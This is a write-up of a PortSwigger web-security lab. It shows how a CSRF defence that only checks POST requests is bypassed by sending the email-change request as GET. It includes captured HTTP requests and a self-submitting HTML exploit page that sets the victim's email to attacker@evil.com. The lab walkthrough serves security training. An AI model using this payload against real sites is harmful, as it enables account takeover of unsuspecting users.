This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.

To solve the lab, use your exploit server to host an HTML page that uses a [CSRF attack](https://portswigger.net/web-security/csrf) to change the viewer's email address.

You can log in to your own account using the following credentials: `wiener:peter`

# Practical
So let's login as user 
```txt
wiener:peter
```
And let's change our email again, let's observe the request sent to change our email.
```html
POST /my-account/change-email HTTP/1.1
Host: target-ac241fce1eeb53b7803b328800560091.web-security-academy.net
Cookie: session=MG1JCQe3oN6plPWhQ28UOeWbF5XA7FMf
Content-Length: 59
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://target-ac241fce1eeb53b7803b328800560091.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://target-ac241fce1eeb53b7803b328800560091.web-security-academy.net/my-account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

email=123%40gmail.com&csrf=p5hb3MgqWu5MZEf2GtEfDiZVWSqnN8nQ
```
Looks like there is a CRSF token. Let's play with it a bit to see if we can bypass it by changing the length, or random values, or used tokens.
```txt
Invalid CRSF token
```
Looks like it doesn't work. So the challenge is about request method. Let's change this to a GET method.
```html
GET /my-account/change-email?email=123%40gmail.com&csrf=123124412313123131312312321 HTTP/1.1
Host: target-ac241fce1eeb53b7803b328800560091.web-security-academy.net
Cookie: session=MG1JCQe3oN6plPWhQ28UOeWbF5XA7FMf
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://target-ac241fce1eeb53b7803b328800560091.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://target-ac241fce1eeb53b7803b328800560091.web-security-academy.net/my-account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close
```
And we get a redirect, so looks like the validation of the token only works on POST methods.
Let's craft our exploit.
```html
<html>
  <body>
    <form action="https://target-ac241fce1eeb53b7803b328800560091.web-security-academy.net/my-account/change-email?email=attacker@evil.com&csrf=123124412313123131312312321" method="GET">
      <input type="hidden" name="email" value="attacker@evil.com" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
And we solved the lab and changed the email.